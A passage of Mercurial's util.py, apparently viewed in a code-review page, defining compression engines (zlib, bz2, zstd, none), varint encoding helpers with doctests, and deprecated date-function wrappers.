3602 3602 chunk = d.unconsumed_tail
3603 3603
3604 3604 return chunkbuffer(gen())
3605 3605
3606 3606 class zlibrevlogcompressor(object):
3607 3607 def compress(self, data):
3608 3608 insize = len(data)
3609 3609 # Caller handles empty input case.
3610 3610 assert insize > 0
3611 3611
3612 3612 if insize < 44:
3613 3613 return None
3614 3614
3615 3615 elif insize <= 1000000:
3616 3616 compressed = zlib.compress(data)
3617 3617 if len(compressed) < insize:
3618 3618 return compressed
3619 3619 return None
3620 3620
3621 3621 # zlib makes an internal copy of the input buffer, doubling
3622 3622 # memory usage for large inputs. So do streaming compression
3623 3623 # on large inputs.
3624 3624 else:
3625 3625 z = zlib.compressobj()
3626 3626 parts = []
3627 3627 pos = 0
3628 3628 while pos < insize:
3629 3629 pos2 = pos + 2**20
3630 3630 parts.append(z.compress(data[pos:pos2]))
3631 3631 pos = pos2
3632 3632 parts.append(z.flush())
3633 3633
3634 3634 if sum(map(len, parts)) < insize:
3635 3635 return ''.join(parts)
3636 3636 return None
3637 3637
3638 3638 def decompress(self, data):
3639 3639 try:
3640 3640 return zlib.decompress(data)
3641 3641 except zlib.error as e:
3642 3642 raise error.RevlogError(_('revlog decompress error: %s') %
3643 3643 forcebytestr(e))
3644 3644
3645 3645 def revlogcompressor(self, opts=None):
3646 3646 return self.zlibrevlogcompressor()
3647 3647
3648 3648 compengines.register(_zlibengine())
3649 3649
3650 3650 class _bz2engine(compressionengine):
3651 3651 def name(self):
3652 3652 return 'bz2'
3653 3653
3654 3654 def bundletype(self):
3655 3655 """An algorithm that produces smaller bundles than ``gzip``.
3656 3656
3657 3657 All Mercurial clients should support this format.
3658 3658
3659 3659 This engine will likely produce smaller bundles than ``gzip`` but
3660 3660 will be significantly slower, both during compression and
3661 3661 decompression.
3662 3662
3663 3663 If available, the ``zstd`` engine can yield similar or better
3664 3664 compression at much higher speeds.
3665 3665 """
3666 3666 return 'bzip2', 'BZ'
3667 3667
3668 3668 # We declare a protocol name but don't advertise by default because
3669 3669 # it is slow.
3670 3670 def wireprotosupport(self):
3671 3671 return compewireprotosupport('bzip2', 0, 0)
3672 3672
3673 3673 def compressstream(self, it, opts=None):
3674 3674 opts = opts or {}
3675 3675 z = bz2.BZ2Compressor(opts.get('level', 9))
3676 3676 for chunk in it:
3677 3677 data = z.compress(chunk)
3678 3678 if data:
3679 3679 yield data
3680 3680
3681 3681 yield z.flush()
3682 3682
3683 3683 def decompressorreader(self, fh):
3684 3684 def gen():
3685 3685 d = bz2.BZ2Decompressor()
3686 3686 for chunk in filechunkiter(fh):
3687 3687 yield d.decompress(chunk)
3688 3688
3689 3689 return chunkbuffer(gen())
3690 3690
3691 3691 compengines.register(_bz2engine())
3692 3692
3693 3693 class _truncatedbz2engine(compressionengine):
3694 3694 def name(self):
3695 3695 return 'bz2truncated'
3696 3696
3697 3697 def bundletype(self):
3698 3698 return None, '_truncatedBZ'
3699 3699
3700 3700 # We don't implement compressstream because it is hackily handled elsewhere.
3701 3701
3702 3702 def decompressorreader(self, fh):
3703 3703 def gen():
3704 3704 # The input stream doesn't have the 'BZ' header. So add it back.
3705 3705 d = bz2.BZ2Decompressor()
3706 3706 d.decompress('BZ')
3707 3707 for chunk in filechunkiter(fh):
3708 3708 yield d.decompress(chunk)
3709 3709
3710 3710 return chunkbuffer(gen())
3711 3711
3712 3712 compengines.register(_truncatedbz2engine())
3713 3713
3714 3714 class _noopengine(compressionengine):
3715 3715 def name(self):
3716 3716 return 'none'
3717 3717
3718 3718 def bundletype(self):
3719 3719 """No compression is performed.
3720 3720
3721 3721 Use this compression engine to explicitly disable compression.
3722 3722 """
3723 3723 return 'none', 'UN'
3724 3724
3725 3725 # Clients always support uncompressed payloads. Servers don't because
3726 3726 # unless you are on a fast network, uncompressed payloads can easily
3727 3727 # saturate your network pipe.
3728 3728 def wireprotosupport(self):
3729 3729 return compewireprotosupport('none', 0, 10)
3730 3730
3731 3731 # We don't implement revlogheader because it is handled specially
3732 3732 # in the revlog class.
3733 3733
3734 3734 def compressstream(self, it, opts=None):
3735 3735 return it
3736 3736
3737 3737 def decompressorreader(self, fh):
3738 3738 return fh
3739 3739
3740 3740 class nooprevlogcompressor(object):
3741 3741 def compress(self, data):
3742 3742 return None
3743 3743
3744 3744 def revlogcompressor(self, opts=None):
3745 3745 return self.nooprevlogcompressor()
3746 3746
3747 3747 compengines.register(_noopengine())
3748 3748
3749 3749 class _zstdengine(compressionengine):
3750 3750 def name(self):
3751 3751 return 'zstd'
3752 3752
3753 3753 @propertycache
3754 3754 def _module(self):
3755 3755 # Not all installs have the zstd module available. So defer importing
3756 3756 # until first access.
3757 3757 try:
3758 3758 from . import zstd
3759 3759 # Force delayed import.
3760 3760 zstd.__version__
3761 3761 return zstd
3762 3762 except ImportError:
3763 3763 return None
3764 3764
3765 3765 def available(self):
3766 3766 return bool(self._module)
3767 3767
3768 3768 def bundletype(self):
3769 3769 """A modern compression algorithm that is fast and highly flexible.
3770 3770
3771 3771 Only supported by Mercurial 4.1 and newer clients.
3772 3772
3773 3773 With the default settings, zstd compression is both faster and yields
3774 3774 better compression than ``gzip``. It also frequently yields better
3775 3775 compression than ``bzip2`` while operating at much higher speeds.
3776 3776
3777 3777 If this engine is available and backwards compatibility is not a
3778 3778 concern, it is likely the best available engine.
3779 3779 """
3780 3780 return 'zstd', 'ZS'
3781 3781
3782 3782 def wireprotosupport(self):
3783 3783 return compewireprotosupport('zstd', 50, 50)
3784 3784
3785 3785 def revlogheader(self):
3786 3786 return '\x28'
3787 3787
3788 3788 def compressstream(self, it, opts=None):
3789 3789 opts = opts or {}
3790 3790 # zstd level 3 is almost always significantly faster than zlib
3791 3791 # while providing no worse compression. It strikes a good balance
3792 3792 # between speed and compression.
3793 3793 level = opts.get('level', 3)
3794 3794
3795 3795 zstd = self._module
3796 3796 z = zstd.ZstdCompressor(level=level).compressobj()
3797 3797 for chunk in it:
3798 3798 data = z.compress(chunk)
3799 3799 if data:
3800 3800 yield data
3801 3801
3802 3802 yield z.flush()
3803 3803
3804 3804 def decompressorreader(self, fh):
3805 3805 zstd = self._module
3806 3806 dctx = zstd.ZstdDecompressor()
3807 3807 return chunkbuffer(dctx.read_from(fh))
3808 3808
3809 3809 class zstdrevlogcompressor(object):
3810 3810 def __init__(self, zstd, level=3):
3811 3811 # Writing the content size adds a few bytes to the output. However,
3812 3812 # it allows decompression to be more optimal since we can
3813 3813 # pre-allocate a buffer to hold the result.
3814 3814 self._cctx = zstd.ZstdCompressor(level=level,
3815 3815 write_content_size=True)
3816 3816 self._dctx = zstd.ZstdDecompressor()
3817 3817 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3818 3818 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3819 3819
3820 3820 def compress(self, data):
3821 3821 insize = len(data)
3822 3822 # Caller handles empty input case.
3823 3823 assert insize > 0
3824 3824
3825 3825 if insize < 50:
3826 3826 return None
3827 3827
3828 3828 elif insize <= 1000000:
3829 3829 compressed = self._cctx.compress(data)
3830 3830 if len(compressed) < insize:
3831 3831 return compressed
3832 3832 return None
3833 3833 else:
3834 3834 z = self._cctx.compressobj()
3835 3835 chunks = []
3836 3836 pos = 0
3837 3837 while pos < insize:
3838 3838 pos2 = pos + self._compinsize
3839 3839 chunk = z.compress(data[pos:pos2])
3840 3840 if chunk:
3841 3841 chunks.append(chunk)
3842 3842 pos = pos2
3843 3843 chunks.append(z.flush())
3844 3844
3845 3845 if sum(map(len, chunks)) < insize:
3846 3846 return ''.join(chunks)
3847 3847 return None
3848 3848
3849 3849 def decompress(self, data):
3850 3850 insize = len(data)
3851 3851
3852 3852 try:
3853 3853 # This was measured to be faster than other streaming
3854 3854 # decompressors.
3855 3855 dobj = self._dctx.decompressobj()
3856 3856 chunks = []
3857 3857 pos = 0
3858 3858 while pos < insize:
3859 3859 pos2 = pos + self._decompinsize
3860 3860 chunk = dobj.decompress(data[pos:pos2])
3861 3861 if chunk:
3862 3862 chunks.append(chunk)
3863 3863 pos = pos2
3864 3864 # Frame should be exhausted, so no finish() API.
3865 3865
3866 3866 return ''.join(chunks)
3867 3867 except Exception as e:
3868 3868 raise error.RevlogError(_('revlog decompress error: %s') %
3869 3869 forcebytestr(e))
3870 3870
3871 3871 def revlogcompressor(self, opts=None):
3872 3872 opts = opts or {}
3873 3873 return self.zstdrevlogcompressor(self._module,
3874 3874 level=opts.get('level', 3))
3875 3875
3876 3876 compengines.register(_zstdengine())
3877 3877
3878 3878 def bundlecompressiontopics():
3879 3879 """Obtains a list of available bundle compressions for use in help."""
3880 3880 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3881 3881 items = {}
3882 3882
3883 3883 # We need to format the docstring. So use a dummy object/type to hold it
3884 3884 # rather than mutating the original.
3885 3885 class docobject(object):
3886 3886 pass
3887 3887
3888 3888 for name in compengines:
3889 3889 engine = compengines[name]
3890 3890
3891 3891 if not engine.available():
3892 3892 continue
3893 3893
3894 3894 bt = engine.bundletype()
3895 3895 if not bt or not bt[0]:
3896 3896 continue
3897 3897
3898 3898 doc = pycompat.sysstr('``%s``\n %s') % (
3899 3899 bt[0], engine.bundletype.__doc__)
3900 3900
3901 3901 value = docobject()
3902 3902 value.__doc__ = doc
3903 3903 value._origdoc = engine.bundletype.__doc__
3904 3904 value._origfunc = engine.bundletype
3905 3905
3906 3906 items[bt[0]] = value
3907 3907
3908 3908 return items
3909 3909
3910 3910 i18nfunctions = bundlecompressiontopics().values()
3911 3911
3912 3912 # convenient shortcut
3913 3913 dst = debugstacktrace
3914 3914
3915 3915 def safename(f, tag, ctx, others=None):
3916 3916 """
3917 3917 Generate a name that it is safe to rename f to in the given context.
3918 3918
3919 3919 f: filename to rename
3920 3920 tag: a string tag that will be included in the new name
3921 3921 ctx: a context, in which the new name must not exist
3922 3922 others: a set of other filenames that the new name must not be in
3923 3923
3924 3924 Returns a file name of the form oldname~tag[~number] which does not exist
3925 3925 in the provided context and is not in the set of other names.
3926 3926 """
3927 3927 if others is None:
3928 3928 others = set()
3929 3929
3930 3930 fn = '%s~%s' % (f, tag)
3931 3931 if fn not in ctx and fn not in others:
3932 3932 return fn
3933 3933 for n in itertools.count(1):
3934 3934 fn = '%s~%s~%s' % (f, tag, n)
3935 3935 if fn not in ctx and fn not in others:
3936 3936 return fn
3937 3937
3938 3938 def readexactly(stream, n):
3939 3939 '''read n bytes from stream.read and abort if less was available'''
3940 3940 s = stream.read(n)
3941 3941 if len(s) < n:
3942 3942 raise error.Abort(_("stream ended unexpectedly"
3943 3943 " (got %d bytes, expected %d)")
3944 3944 % (len(s), n))
3945 3945 return s
3946 3946
3947 3947 def uvarintencode(value):
3948 3948 """Encode an unsigned integer value to a varint.
3949 3949
3950 3950 A varint is a variable length integer of 1 or more bytes. Each byte
3951 3951 except the last has the most significant bit set. The lower 7 bits of
3952 3952 each byte store the 2's complement representation, least significant group
3953 3953 first.
3954 3954
3955 3955 >>> uvarintencode(0)
3956 3956 '\\x00'
3957 3957 >>> uvarintencode(1)
3958 3958 '\\x01'
3959 3959 >>> uvarintencode(127)
3960 3960 '\\x7f'
3961 3961 >>> uvarintencode(1337)
3962 3962 '\\xb9\\n'
3963 3963 >>> uvarintencode(65536)
3964 3964 '\\x80\\x80\\x04'
3965 3965 >>> uvarintencode(-1)
3966 3966 Traceback (most recent call last):
3967 3967 ...
3968 3968 ProgrammingError: negative value for uvarint: -1
3969 3969 """
3970 3970 if value < 0:
3971 3971 raise error.ProgrammingError('negative value for uvarint: %d'
3972 3972 % value)
3973 3973 bits = value & 0x7f
3974 3974 value >>= 7
3975 3975 bytes = []
3976 3976 while value:
3977 3977 bytes.append(pycompat.bytechr(0x80 | bits))
3978 3978 bits = value & 0x7f
3979 3979 value >>= 7
3980 3980 bytes.append(pycompat.bytechr(bits))
3981 3981
3982 3982 return ''.join(bytes)
3983 3983
3984 3984 def uvarintdecodestream(fh):
3985 3985 """Decode an unsigned variable length integer from a stream.
3986 3986
3987 3987 The passed argument is anything that has a ``.read(N)`` method.
3988 3988
3989 3989 >>> try:
3990 3990 ... from StringIO import StringIO as BytesIO
3991 3991 ... except ImportError:
3992 3992 ... from io import BytesIO
3993 3993 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3994 3994 0
3995 3995 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3996 3996 1
3997 3997 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3998 3998 127
3999 3999 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4000 4000 1337
4001 4001 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4002 4002 65536
4003 4003 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4004 4004 Traceback (most recent call last):
4005 4005 ...
4006 4006 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4007 4007 """
4008 4008 result = 0
4009 4009 shift = 0
4010 4010 while True:
4011 4011 byte = ord(readexactly(fh, 1))
4012 4012 result |= ((byte & 0x7f) << shift)
4013 4013 if not (byte & 0x80):
4014 4014 return result
4015 4015 shift += 7
4016 4016
4017 4017 ###
4018 4018 # Deprecation warnings for util.py splitting
4019 4019 ###
4020 4020
4021 4021 defaultdateformats = dateutil.defaultdateformats
4022 4022
4023 4023 extendeddateformats = dateutil.extendeddateformats
4024 4024
4025 4025 def makedate(*args, **kwargs):
4026 4026 msg = ("'util.makedate' is deprecated, "
4027 4027 "use 'utils.dateutil.makedate'")
4028 4028 nouideprecwarn(msg, "4.6")
4029 4029 return dateutil.makedate(*args, **kwargs)
4030 4030
4031 4031 def datestr(*args, **kwargs):
4032 4032 msg = ("'util.datestr' is deprecated, "
4033 4033 "use 'utils.dateutil.datestr'")
4034 4034 nouideprecwarn(msg, "4.6")
4035 4035 debugstacktrace()
4036 4036 return dateutil.datestr(*args, **kwargs)
4037 4037
4038 4038 def shortdate(*args, **kwargs):
4039 4039 msg = ("'util.shortdate' is deprecated, "
4040 4040 "use 'utils.dateutil.shortdate'")
4041 4041 nouideprecwarn(msg, "4.6")
4042 4042 return dateutil.shortdate(*args, **kwargs)
4043 4043
4044 4044 def parsetimezone(*args, **kwargs):
4045 4045 msg = ("'util.parsetimezone' is deprecated, "
4046 4046 "use 'utils.dateutil.parsetimezone'")
4047 4047 nouideprecwarn(msg, "4.6")
4048 4048 return dateutil.parsetimezone(*args, **kwargs)
4049 4049
4050 4050 def strdate(*args, **kwargs):
4051 4051 msg = ("'util.strdate' is deprecated, "
4052 4052 "use 'utils.dateutil.strdate'")
4053 4053 nouideprecwarn(msg, "4.6")
4054 4054 return dateutil.strdate(*args, **kwargs)
4055 4055
4056 4056 def parsedate(*args, **kwargs):
4057 4057 msg = ("'util.parsedate' is deprecated, "
4058 4058 "use 'utils.dateutil.parsedate'")
4059 4059 nouideprecwarn(msg, "4.6")
4060 4060 return dateutil.parsedate(*args, **kwargs)
4061 4061
4062 4062 def matchdate(*args, **kwargs):
4063 4063 msg = ("'util.matchdate' is deprecated, "
4064 4064 "use 'utils.dateutil.matchdate'")
4065 4065 nouideprecwarn(msg, "4.6")
4066 4066 return dateutil.matchdate(*args, **kwargs)
General Comments 0
You need to be logged in to leave comments. Login now